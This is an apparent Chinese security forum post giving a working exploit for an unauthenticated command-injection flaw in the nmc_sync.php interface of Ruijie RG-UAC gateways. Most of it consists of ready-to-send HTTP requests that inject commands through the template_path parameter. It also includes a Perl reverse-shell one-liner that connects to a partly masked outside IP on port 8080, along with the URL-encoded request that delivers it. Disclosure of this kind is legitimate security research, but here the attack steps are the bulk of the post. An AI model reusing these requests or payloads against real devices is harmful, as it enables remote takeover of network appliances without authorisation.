|
|
程哥 潇湘信安 2023-12-10 03:30 发表于湖南
0x01 漏洞概述
锐捷RG-UAC应用管理网关nmc_sync.php接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
0x02 复现环境
0x03 漏洞复现
POC:
- GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Accept-Encoding: gzip
验证
- GET /view/systemConfig/management/test.txt HTTP/1.1
- Host: your-ip
- Accept-Encoding: gzip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0x04 反弹shell
安全设备的Linux很多命令是没有的,经过测试后发现只有Perl能反弹shell,在 https://revshells.isisy.com 网站生成Perl的反弹shell。
原始的反弹shell如下,在BurpSuite中需要URL编码,方法是选中,然后Ctrl+U快捷键编码即可。
- perl -e 'use Socket;$i="121.*.***.*";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
最终使用Perl反弹shell的POC如下:
- GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d"121.*.***.*"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b' HTTP/1.1
- Host: ***.**.***.**:****
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Connection: close
- Cookie: PHPSESSID=c73e6c1766d9a1173ac820cb22dad128
- Upgrade-Insecure-Requests: 1
- Sec-Fetch-Dest: document
- Sec-Fetch-Mode: navigate
- Sec-Fetch-Site: none
- Sec-Fetch-User: ?1
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2023-12-10 12:21:04